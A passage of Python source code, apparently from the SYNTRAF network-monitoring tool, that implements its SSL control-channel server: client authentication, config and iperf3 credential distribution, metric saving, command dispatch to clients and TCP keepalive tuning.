dict_by_node_generated_config[server_client['UID']]['CLIENT'] = {\n \"RSA_KEY_LISTENERS\": _config['SERVER']['RSA_KEY_LISTENERS'].decode(),\n \"RSA_KEY_CONNECTORS\": _config['SERVER']['RSA_KEY_CONNECTORS'].decode(),\n \"IPERF3_USERNAME\": _config['SERVER']['IPERF3_USERNAME'],\n \"IPERF3_PASSWORD\": _config['SERVER']['IPERF3_PASSWORD'],\n \"IPERF3_PASSWORD_HASH\": _config['SERVER']['IPERF3_PASSWORD_HASH']}\n dict_by_node_generated_config[server_client['UID']]['GLOBAL'] = {\n \"IPERF3_TIME_SKEW_THRESHOLD\": _config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']}\n sock_send(sckt, dict_by_node_generated_config[server_client['UID']], \"NEWCONFIG\")\n bool_we_have_config_for_this_client = True\n except Exception as exc:\n server_log.error(f\"Handler:handle:{type(exc).__name__}:{exc}\", exc_info=True)\n\n return bool_we_have_config_for_this_client\n\n\ndef server_save_metric(obj_client, conn_db, received_data, address, sckt):\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE METRICS\")\n try:\n results_of_write_operation_on_multiple_db = []\n for conn in conn_db:\n # TODO, print what is the database we are actually writing to and the result\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - SAVING METRICS TO DATABASE '{conn.get_Database_UID()}'\")\n results_of_write_operation_on_multiple_db.append(\n conn.save_metrics_to_database_with_buffer(received_data['PAYLOAD'], address, obj_client.client_uid))\n\n result = \"FAIL\"\n if \"OK\" in results_of_write_operation_on_multiple_db and \"ERROR\" not in results_of_write_operation_on_multiple_db:\n result = \"FULL\"\n elif \"OK\" in results_of_write_operation_on_multiple_db and \"ERROR\" in results_of_write_operation_on_multiple_db:\n result = \"PARTIAL\"\n server_log.warning(f\"SERVER WAS NOT ABLE TO SAVE METRICS TO ALL DATABASES'\")\n\n # For now, if data is written to at least one database, allow the client to empty his cache.\n # In the future, we could get more sophisticated and resend the data to specific database\n if result == \"FULL\" or result == \"PARTIAL\":\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid} WRITTEN TO DATABASE\")\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - SENDING ACK TO CLIENT\")\n sock_send(sckt, \"OK\", \"ACK\")\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - ACK SENT TO CLIENT\")\n else:\n server_log.error(\n f\"CONTEXT: {obj_client.client_uid} - UNABLE TO WRITE {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid}\")\n sock_send(sckt, \"NOK\", \"ACK\")\n except Exception as exc:\n server_log.error(\n f\"CONTEXT: {obj_client.client_uid} - UNABLE TO WRITE {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid}\")\n sock_send(sckt, \"NOK\", \"ACK\")\n\n\ndef server_auth(received_data, obj_client, _config, address, dict_of_commands_for_network_clients, sckt,\n _dict_by_node_generated_config, dict_of_client_pending_acceptance, threads_n_processes):\n obj_client.client_uid = received_data['PAYLOAD']['CLIENT_UID']\n public_key = received_data['PAYLOAD']['PUBLIC_KEY']\n\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - NEW CONNECTION FROM CLIENT_UID : '{obj_client.client_uid}', SOURCE_IP : '{address}'\")\n\n auth_ok = False\n # CHECK IF PUBLIC KEY IS IN THE CONFIG FILE FOR THIS SPECIFIC CLIENT\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n if 'PUBLIC_KEY' in server_client:\n print(\"NEW AUTH SUCCESSFUL **************************************\")\n auth_ok = True\n pass\n\n if not auth_ok:\n # add this public key and other interesting informations to a dictionnary that will be use to keep pending acceptation\n dict_of_client_pending_acceptance[obj_client.client_uid] = public_key\n\n # Authentication, if token is wrong, disconnect\n is_authenticated, rejection_explanation = authenticate_server_client(_config, received_data, obj_client, sckt)\n\n if is_authenticated:\n obj_client.status = \"CONNECTED\"\n obj_client.status_explanation = \"AUTHENTICATION SUCCESSFUL\"\n obj_client.status_since = datetime.now()\n\n sock_send(sckt, None, obj_client.status_explanation)\n\n else:\n obj_client.status = rejection_explanation\n obj_client.status_explanation = \"AUTHENTICATION FAILED\"\n obj_client.status_since = datetime.now()\n\n sock_send(sckt, rejection_explanation, \"AUTH_FAILED\")\n\n return False\n\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n\n # If this is a dynamic IP client\n if server_client['IP_ADDRESS'] == \"0.0.0.0\":\n\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - THIS CLIENT HAS DYNAMIC IP, UPDATING LOCAL CONFIG AND PUSHING TO OTHER CLIENTS\")\n\n # So that we can track that this is a dynamic client and rollback the ip when disconnection occur.\n obj_client.bool_dynamic_client = True\n\n # Updating the client object with the ip address he's coming from\n server_client['IP_ADDRESS'] = obj_client.ip_address\n\n # We need to regenerate the config, we pass the _dict_by_node_generated_config variable to avoid the webui and process_and_thread to continue to use the old memory pointer\n _dict_by_node_generated_config, _dict_by_group_of_generated_tuple_for_map = generate_client_config_mesh(\n _config, _dict_by_node_generated_config)\n\n # Telling to every other client to update their config\n for server_client2 in _config['SERVER_CLIENT']:\n\n # If there is an existing OVERRIDE_DST_NODE_IP, do not update the config\n skip_flag = False\n if 'OVERRIDE_DST_NODE_IP' in server_client2:\n if server_client2['OVERRIDE_DST_NODE_IP']:\n for override_ip_client_uid in server_client2['OVERRIDE_DST_NODE_IP']:\n if override_ip_client_uid == obj_client.client_uid:\n skip_flag = True\n\n if not skip_flag:\n # Do not update the client itself\n if not server_client2['UID'] == obj_client.client_uid:\n dict_of_commands_for_network_clients[server_client2['UID']] = []\n dict_of_commands_for_network_clients[server_client2['UID']].append(\n {\"ACTION\": \"UPDATED_CONFIG\", \"ELEMENT\": \"CLIENT_IP\",\n \"CLIENT_UID\": obj_client.client_uid, \"IP_ADDRESS\": obj_client.ip_address})\n\n # Show an alert in the log when the clock skew is too great\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - STARTING VALIDATION OF CLOCK SKEW\")\n validate_clock_skew(_config, received_data, obj_client)\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - VALIDATION OF CLOCK SKEW COMPLETED\")\n\n # Send the config to the client\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - SENDING CONFIG TO THE CLIENT\")\n bool_we_have_config_for_this_client = send_config(_dict_by_node_generated_config, obj_client.client_uid, sckt, _config)\n\n obj_client.syntraf_version = received_data['PAYLOAD']['SYNTRAF_CLIENT_VERSION']\n\n # No config for this client!\n if not bool_we_have_config_for_this_client:\n sock_send(sckt, None, \"NEWCONFIG\")\n server_log.info(f\"CONTEXT: {obj_client.client_uid} - NO CONFIG FOR THIS CLIENT'\")\n\n obj_client.status = \"CONNECTED (PASSIVE)\"\n obj_client.status_explanation = \"NO CONFIG FOR THIS CLIENT\"\n obj_client.status_since = datetime.now()\n\n return True\n\n\ndef server_save_stats_metric(obj_client, received_data):\n \"\"\"\n Insert system stats metric we just received from the client into corresponding obj_client.system_stats dictionary\n It will eventually be read by the API for the WEBUI\n It is called everytime the client send stats which should be quite often\n :param obj_client: The object representing the current client\n :param received_data: The payload we just received from the client containing the systems stats metric\n \"\"\"\n # Make sure that the client system stats history does not get too big\n if len(obj_client.system_stats.setdefault('if_pct_usage_rx', [])) >= 100: obj_client.system_stats[\n 'if_pct_usage_rx'].pop(0)\n if len(obj_client.system_stats.setdefault('if_pct_usage_tx', [])) >= 100: obj_client.system_stats[\n 'if_pct_usage_tx'].pop(0)\n if len(obj_client.system_stats.setdefault('mem_pct_free', [])) >= 100: obj_client.system_stats['mem_pct_free'].pop(\n 0)\n if len(obj_client.system_stats.setdefault('cpu_pct_usage', [])) >= 100: obj_client.system_stats[\n 'cpu_pct_usage'].pop(0)\n\n obj_client.system_stats['if_pct_usage_rx'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['if_pct_usage_rx']))\n obj_client.system_stats['if_pct_usage_tx'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['if_pct_usage_tx']))\n obj_client.system_stats['mem_pct_free'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['mem_pct_free']))\n obj_client.system_stats['cpu_pct_usage'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['cpu_pct_usage']))\n\n\ndef server_awaiting_commands(client_uid, dict_of_commands_for_network_clients, sckt):\n \"\"\"\n Read a dictionary of pending command and send them to the client\n :param client_uid: The uid of the client we are serving\n :param dict_of_commands_for_network_clients: A dictionary of all the pending command. It's organized by client_uid and each command are a sub dictionnary that contain mandatorily the key \"ACTION\"\n :param sckt: The current socket connected to the client\n \"\"\"\n # The client is waiting, if there is no explicit action, send a NOP\n sent_an_action = False\n # Do we have action to send to client?\n if client_uid in dict_of_commands_for_network_clients:\n if len(dict_of_commands_for_network_clients[client_uid]) >= 1:\n for action in dict_of_commands_for_network_clients[client_uid]:\n server_log.info(f\"SENDING THE ACTION '{action}' TO THE CLIENT {client_uid}\")\n if action['ACTION'] == \"RECONNECT_CLIENT\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A 'RECONNECT_CLIENT' COMMAND\")\n sock_send(sckt, \"\", \"RECONNECT_CLIENT\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'RECONNECT' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n elif action['ACTION'] == \"RESTART_CLIENT\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A 'RESTART_CLIENT' COMMAND\")\n sock_send(sckt, \"\", \"RESTART_CLIENT\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'RESTART_CLIENT' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n elif action['ACTION'] == \"UPDATED_CONFIG\":\n if action['ELEMENT'] == \"CLIENT_IP\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING AN 'UPDATE_CONFIG' ACTION FOR A CLIENT_IP\")\n sock_send(sckt, action, \"DIFFCONFIG\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'UPDATE_CONFIG' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n\n # The client is waiting for a command, if we don't have any, we should send a NOP to unblock it.\n if not sent_an_action:\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A NOP\")\n sock_send(sckt, \"\", \"NOP\")\n server_log.debug(f\"CONTEXT: {client_uid} - NOP SENT\")\n\n\ndef server_save_system_infos(obj_client, received_data):\n \"\"\"\n Assign the system_infos we just received from the client to the corresponding obj_client. It will eventually be read by the API for the WEBUI\n It is called only one time just after the authentication\n :param obj_client: The object representing the current client\n :param received_data: The payload we just received from the client containing the systems informations\n \"\"\"\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE SYSTEM INFOS\")\n obj_client.system_infos = received_data['PAYLOAD']\n\n\ndef server_forget_dynamic_client_ip(obj_client, _config, dict_of_commands_for_network_clients):\n \"\"\"\n When a client does not have a static IP configured in the config file, it is assigned with a default \"0.0.0.0\" IP.\n When then syntraf client thread spawner see this, it will not launch the iperf3 CONNECTOR thread until he receive\n a COMMAND to update the IP to something else. When the client with dynamic IP disconnect, we replace the IP by\n \"0.0.0.0\" again and inform the other client so that no CONNECTOR are launch for nothing.\n :param obj_client: The object representing the current client\n :param _config: The TOML config file (nested dict)\n :param dict_of_commands_for_network_clients: A dictionary of all the pending command. It's organized by client_uid\n and each command are a sub dictionnary that contain mandatorily the key \"ACTION\"\n \"\"\"\n # Rollback ip_address to the default\n if obj_client.bool_dynamic_client:\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n server_client['IP_ADDRESS'] = \"0.0.0.0\"\n\n # Telling every client to update their config, as this client is gone and his real IP is no longer kown for sure.\n # It will trigger on the client, a termination of the running CONNECTORS associated with that IP and prevent it from restarting because \"0.0.0.0\" is use as a condition in\n # process_and_thread to not launch a CONNECTOR\n for server_client in _config['SERVER_CLIENT']:\n\n # If there is an existing OVERRIDE_DST_NODE_IP, do not update the IP\n skip_flag = False\n if 'OVERRIDE_DST_NODE_IP' in server_client:\n if server_client['OVERRIDE_DST_NODE_IP']:\n for override_ip_client_uid in server_client['OVERRIDE_DST_NODE_IP']:\n if override_ip_client_uid == obj_client.client_uid:\n skip_flag = True\n\n if not skip_flag:\n # Make sure we are not updating the dynamic client itself\n if not obj_client.client_uid == server_client['UID']:\n if not server_client['UID'] in dict_of_commands_for_network_clients:\n dict_of_commands_for_network_clients[server_client['UID']] = []\n dict_of_commands_for_network_clients[server_client['UID']].append(\n {\"ACTION\": \"UPDATED_CONFIG\", \"ELEMENT\": \"CLIENT_IP\", \"CLIENT_UID\": obj_client.client_uid,\n \"IP_ADDRESS\": \"0.0.0.0\"})\n\n\ndef server_save_thread_status(obj_client, received_data):\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE THREAD STATUS\")\n obj_client.thread_status = received_data['PAYLOAD']\n\n\nclass Handler(StreamRequestHandler):\n def handle(self):\n address = self.client_address\n sckt = self.connection\n _config = self.server._config\n\n threading.current_thread().name = f\"CONTROL CHANNEL CLIENT:{address}\"\n\n dict_of_commands_for_network_clients = self.server.dict_of_commands_for_network_clients\n dict_of_clients = self.server.dict_of_clients\n conn_db = self.server.conn_db\n _dict_by_node_generated_config = self.server.dict_by_node_generated_config\n dict_of_client_pending_acceptance = self.server.dict_of_client_pending_acceptance\n threads_n_processes = self.server.threads_n_processes\n\n current_thread = threading.current_thread()\n log.debug(current_thread)\n\n uid = address[0]\n dict_of_clients[uid] = cc_client(status=\"CONNECTING\", status_since=datetime.now(),\n status_explanation=\"NOT YET AUTHENTICATED\", client_uid=\"UNKNOWN\",\n bool_dynamic_client=False, tcp_port=address[1], ip_address=address[0])\n\n try:\n while True:\n # no need to loop if no server_client\n if \"SERVER_CLIENT\" in _config:\n received_data = \"\"\n received_data = sock_rcv(sckt)\n\n if received_data is None:\n received_data = sock_rcv(sckt)\n\n if received_data is None:\n server_log.debug(f\"CONTEXT: {dict_of_clients[uid].client_uid} - INVALID DATA RECEIVED\")\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n break\n else:\n # Log the command that was received\n server_log.debug(\n f\"CONTEXT: {dict_of_clients[uid].client_uid} - RECEIVED {received_data['COMMAND']}\")\n\n if received_data['COMMAND'] == \"AUTH\":\n\n if not server_auth(received_data, dict_of_clients[uid], _config,\n dict_of_clients[uid].ip_address, dict_of_commands_for_network_clients, sckt,\n _dict_by_node_generated_config, dict_of_client_pending_acceptance, threads_n_processes):\n return\n\n # Now that we know the identity of the client connecting, we can update the dictionary of client objects\n new_uid = dict_of_clients[uid].client_uid\n dict_of_clients[new_uid].client_uid = new_uid\n dict_of_clients[new_uid].status = dict_of_clients[uid].status\n dict_of_clients[new_uid].bool_dynamic_client = dict_of_clients[uid].bool_dynamic_client\n dict_of_clients[new_uid].status_since = dict_of_clients[uid].status_since\n dict_of_clients[new_uid].status_explanation = dict_of_clients[uid].status_explanation\n dict_of_clients[new_uid].clock_skew_in_seconds = dict_of_clients[uid].clock_skew_in_seconds\n dict_of_clients[new_uid].syntraf_version = dict_of_clients[uid].syntraf_version\n dict_of_clients[new_uid].ip_address = address[0]\n dict_of_clients[new_uid].tcp_port = address[1]\n dict_of_clients.pop(uid)\n uid = new_uid\n\n elif received_data['COMMAND'] == \"SAVE_METRIC\":\n server_save_metric(dict_of_clients[uid], conn_db, received_data,\n dict_of_clients[uid].ip_address, sckt)\n\n elif received_data['COMMAND'] == \"SAVE_STATS_METRIC\":\n server_save_stats_metric(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"SAVE_THREAD_STATUS\":\n server_save_thread_status(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"SYSTEM_INFOS\":\n server_save_system_infos(dict_of_clients[uid], received_data)\n\n elif received_data['COMMAND'] == \"AWAITING_COMMAND\":\n server_awaiting_commands(dict_of_clients[uid].client_uid, dict_of_commands_for_network_clients,\n sckt)\n\n elif received_data['COMMAND'] == \"HEARTBEAT\":\n pass\n\n else:\n print(\"UNKNOWN COMMAND:\", received_data['COMMAND'])\n else:\n time.sleep(2)\n\n except socket.timeout as exc:\n server_log.error(f\"SOCKET TIMEOUT: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n dict_of_clients[uid].status_explanation = \"SOCKET TIMEOUT\"\n except json.JSONDecodeError as exc:\n server_log.error(f\"JSON DECODING FAILED FOR STRING\")\n except OSError as exc:\n if exc.errno == 32: # BROKEN PIPE, THE OTHER END HAS GONE AWAY\n dict_of_clients[uid].status_explanation = \"BROKEN PIPE\"\n server_log.error(f\"BROKEN PIPE: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # CONNECTION RESET BY PEER\n elif exc.errno == 104:\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n elif exc.errno == 113:\n dict_of_clients[uid].status_explanation = \"NO ROUTE TO HOST\"\n server_log.error(f\"NO ROUTE TO HOST: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # CONNECTION TIMEOUT\n elif exc.errno == 110:\n dict_of_clients[uid].status_explanation = \"CONNECTION TIMEOUT\"\n server_log.error(f\"CONNECTION TIMEOUT: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10053] #An established connection was aborted by the software in your host machine\n elif exc.errno == 10053:\n dict_of_clients[uid].status_explanation = \"CONNECTION ABORTED\"\n server_log.error(f\"CONNECTION ABORTED: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10054]\n elif exc.errno == 10054:\n dict_of_clients[uid].status_explanation = \"CONNECTION RESET BY PEER\"\n server_log.error(f\"CONNECTION RESET BY PEER: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n elif exc.errno == 10057: # FOR WINDOWS [WinError 10057]\n dict_of_clients[uid].status_explanation = \"SOCKET IS NOT CONNECTED\"\n server_log.error(\n f\"{type(exc).__name__.upper()}:{exc.errno}: {dict_of_clients[uid].ip_address}: CLOSING CONNECTION\")\n else:\n dict_of_clients[uid].status_explanation = \"UNKNOWN OSError\"\n server_log.error(f\"UNHANDLE OSError (st_mesh:sock_rcv): {dict_of_clients[uid].ip_address}:\", exc,\n exc.errno, exc.strerror)\n except Exception as exc:\n dict_of_clients[uid].status_explanation = \"UNKNOWN\"\n server_log.error(f\"Handler:handle:{type(exc).__name__}:{exc}\", exc_info=True)\n\n finally:\n # The socket on the other end is probably closed\n server_log.error(f\"CLIENT: {dict_of_clients[uid].ip_address} DISCONNECTED\")\n\n try:\n # If this is a dynamic client, once disconnected, we should forget about the ip address\n server_forget_dynamic_client_ip(dict_of_clients[uid], _config, dict_of_commands_for_network_clients)\n\n # Updating the status\n # We don't want to overwrite a reason for failed authentication, so we overwrite only when the client was connected\n if \"CONNECTED\" in dict_of_clients[uid].status:\n dict_of_clients[uid].status = \"DISCONNECTED\"\n dict_of_clients[uid].status_since = datetime.now()\n\n # Reinitializing stats array so that the sparklines graphes does not appear in the webui\n dict_of_clients[uid].system_stats['if_pct_usage_rx'] = []\n dict_of_clients[uid].system_stats['if_pct_usage_tx'] = []\n dict_of_clients[uid].system_stats['mem_pct_free'] = []\n dict_of_clients[uid].system_stats['cpu_pct_usage'] = []\n\n sckt.close()\n\n except Exception as e:\n server_log.error(\n f\"AN ERROR OCCURRED WHILE FREEING RESOURCE FOR THE CLIENT: {dict_of_clients[uid].client_uid}/{dict_of_clients[uid].ip_address}\")\n\n\nclass SSL_TCPServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n certfile,\n keyfile,\n bind_and_activate=True,\n ssl_version=ssl.PROTOCOL_TLSv1):\n TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)\n self.certfile = certfile\n self.keyfile = keyfile\n self.ssl_version = ssl_version\n\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n connstream = ssl.wrap_socket(newsocket,\n server_side=True,\n certfile=self.certfile,\n keyfile=self.keyfile,\n #ssl_version=self.ssl_version,\n cert_reqs=ssl.CERT_NONE,\n do_handshake_on_connect=True)\n return connstream, fromaddr\n\n def get_config(self):\n return self._config\n\nclass SSLnThreadingTCPServer(ThreadingMixIn, SSL_TCPServer):\n # Make sure all the client are close when server is closed\n daemon_threads = True\n\n\n#################################################################################\n### MESH SERVER SOCKET LISTENER\n### http://www.gevent.org/api/gevent.server.html\n### http://www.gevent.org/api/gevent.baseserver.html#gevent.baseserver.BaseServer\n### https://github.com/veryhappythings/gevent-ssl-example/blob/master/stateful_server.py\n### https://dadruid5.com/2018/07/30/running-a-gevent-streamserver-in-a-thread-for-maximum-control/#:~:text=StreamServer%20Gevent%20maintains%20a%20server%20through%20gevent.server.StreamServer.%20This,pool%20for%20controlling%20the%20number%20of%20connections%20created%3A\n### https://stackoverflow.com/questions/21631799/how-can-i-pass-parameters-to-a-requesthandler\n#################################################################################\ndef server(_config, threads_n_processes, stop_thread, dict_by_node_generated_config, obj_stats, conn_db,\n dict_of_commands_for_network_clients, dict_of_clients, dict_of_client_pending_acceptance):\n # Generating the rsa keypair for iperf3 authentication\n gen_rsa_iperf3(server_log, _config)\n gen_user_pass_iperf3(server_log, _config)\n _config['SERVER']['IPERF3_PASSWORD_HASH'] = gen_iperf3_password_hash(_config['SERVER']['IPERF3_USERNAME'],\n _config['SERVER']['IPERF3_PASSWORD'])\n server_address = (_config['SERVER']['BIND_ADDRESS'], int(_config['SERVER']['SERVER_PORT']))\n\n # Avoid \"Address already in use\" when restarting server\n TCPServer.allow_reuse_address = True\n\n try:\n # Validating if we need to wrap the socket with legit cert or self-signed\n self_signed_flag = True\n if 'SERVER_X509_SELFSIGNED' in _config['SERVER']:\n if _config['SERVER']['SERVER_X509_SELFSIGNED'] == \"NO\":\n self_signed_flag = False\n if not self_signed_flag:\n server_log.debug(f\"CONTROL CHANNEL SERVER SOCKET CREATED\")\n tcp_server = SSLnThreadingTCPServer(server_address, Handler,\n keyfile=_config['SERVER']['SERVER_X509_PRIVATE_KEY'],\n certfile=_config['SERVER']['SERVER_X509_CERTIFICATE'],\n bind_and_activate=True)\n\n server_log.debug(\n f\"BINDING CONTROL CHANNEL SERVER SSL SOCKET TO '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' SUCCESSFUL\")\n server_log.debug(f\"CONTROL CHANNEL SERVER SSL SOCKET LISTENING\")\n else:\n\n server_log.debug(f\"CONTROL CHANNEL SERVER SOCKET CREATED\")\n tcp_server = SSLnThreadingTCPServer(server_address, Handler,\n keyfile=os.path.join(\n DefaultValues.DEFAULT_SERVER_X509_SELFSIGNED_DIRECTORY,\n \"private_key_server.pem\"),\n certfile=os.path.join(\n DefaultValues.DEFAULT_SERVER_X509_SELFSIGNED_DIRECTORY,\n \"certificate_server.pem\"), bind_and_activate=True)\n\n server_log.debug(\n f\"BINDING CONTROL CHANNEL SERVER SSL SOCKET TO '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' SUCCESSFUL\")\n server_log.debug(f\"CONTROL CHANNEL SERVER SSL SOCKET LISTENING\")\n\n tcp_server.dict_by_node_generated_config = dict_by_node_generated_config\n tcp_server.conn_db = conn_db\n tcp_server.dict_of_commands_for_network_clients = dict_of_commands_for_network_clients\n tcp_server.dict_of_clients = dict_of_clients\n tcp_server.dict_of_client_pending_acceptance = dict_of_client_pending_acceptance\n tcp_server._config = _config\n tcp_server.threads_n_processes = threads_n_processes\n tcp_server.serve_forever()\n\n except OSError as msg:\n server_log.error(\n f\"UNABLE TO START SERVER ON '{_config['SERVER']['BIND_ADDRESS']}:{_config['SERVER']['SERVER_PORT']}' : {msg}\")\n sys.exit()\n\n except Exception as exc:\n server_log.error(f\"server:{type(exc).__name__}:{exc}\", exc_info=True)\n print(traceback.format_exc())\n sys.exit()\n\n\ndef set_tcp_ka(sckt, log):\n sckt.settimeout(60)\n \"\"\"\n Setting socket parameters\n SO_KEEPALIVE: activate keepalive\n TCP_KEEPCNT, Kernel 2.4 : overrides tcp_keepalive_probes\n Gets or sets the number of TCP keep alive probes that will be sent before the connection is terminated. It is illegal to set TCP_KEEPCNT to a value greater than 255. (Starting with Windows 10, version 1703.)\n TCP_KEEPIDLE, Kernel 2.4 : overrides tcp_keepalive_time\n Gets or sets the number of seconds a TCP connection will remain idle before keepalive probes are sent to the remote. (This option is available starting with Windows 10, version 1709.)\n TCP_KEEPINTVL, Kernel 2.4 : overrides tcp_keepalive_intvl\n Gets or sets the number of seconds a TCP connection will wait for a keepalive response before sending another keepalive probe. (This option is available starting with Windows 10, version 1709.)\n SIO_KEEPALIVE_VALS: WINDOWS ONLY\n enables or disables the per-connection setting of the TCP keep-alive option which specifies the TCP keep-alive timeout and interval.\n onoff;\n keepalivetime;\n keepaliveinterval;\n\n TCP_USER_TIMEOUT (rfc5482), Kernel 2.6.37 :\n\n https://man7.org/linux/man-pages/man7/tcp.7.html\n\n \"\"\"\n\n # SO_TIMEOUT\n\n # Platform independent SO_KEEPALIVE\n keepalive_before = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE)\n sckt.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n keepalive_after = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE)\n log.debug(f\"ENABLING SO_KEEPALIVE ON SOCKET. FROM '{keepalive_before}' to '{keepalive_after}'\")\n\n # # Platform independent TCP_NODELAY\n # nodelay_before = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY)\n # sckt.setsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY, 1)\n # nodelay_after = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY)\n # log.debug(f\"ENABLING TCP_NODELAY ON SOCKET. FROM '{nodelay_before}' to '{nodelay_after}'\")\n\n platform = sys.platform\n\n \"\"\"\n The following values start the keepalive after 1 second (ka_after_idle_sec) of idleness,\n then sends a keepalive ping once every 2 seconds (ka_interval_sec),\n and closes the connection after 5 failed ping (ka_max_fails), or 10 seconds\"\n \"\"\"\n ka_after_idle_sec = 1\n ka_interval_sec = 2\n ka_max_fails = 5\n tcp_user_timeout = 1\n tcp_buffer = 0\n\n if platform == \"linux\":\n ka_after_idle_sec_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)\n ka_interval_sec_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)\n ka_max_fails_before = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)\n tcp_user_timeout_before = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT)\n tcp_buffer_before = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)\n\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, ka_after_idle_sec)\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, ka_interval_sec)\n sckt.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, ka_max_fails)\n sckt.setsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT, tcp_user_timeout)\n sckt.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, tcp_buffer)\n\n ka_after_idle_sec_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE)\n ka_interval_sec_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL)\n ka_max_fails_after = sckt.getsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT)\n tcp_user_timeout_after = sckt.getsockopt(socket.SOL_SOCKET, socket.TCP_USER_TIMEOUT)\n tcp_buffer_after = sckt.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF)\n\n log.debug(f\"MODIFYING SO_SNDBUF ON SOCKET FROM '{tcp_buffer_before}' to '{tcp_buffer_after}'\")\n log.debug(\n f\"MODIFYING TCP_USER_TIMEOUT ON SOCKET FROM '{tcp_user_timeout_before}' to '{tcp_user_timeout_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPIDLE ON SOCKET FROM '{ka_after_idle_sec_before}' to '{ka_after_idle_sec_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPINTVL ON SOCKET FROM '{ka_interval_sec_before}' to '{ka_interval_sec_after}'\")\n log.debug(f\"MODIFYING TCP_KEEPCNT ON SOCKET FROM '{ka_max_fails_before}' to '{ka_max_fails_after}'\")\n\n # TODO\n elif platform == \"darwin\":\n pass\n # TCP_CONNECTIONTIMEOUT\n # TCP_RXT_CONNDROPTIME\n # sends a keepalive ping once every 3 seconds (interval_sec)\n # \"\"\"\n # # scraped from /usr/include, not exported by python's socket module\n # TCP_KEEPALIVE = 0x10\n # sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n # sock.setsockopt(socket.IPPROTO_TCP, TCP_KEEPALIVE, 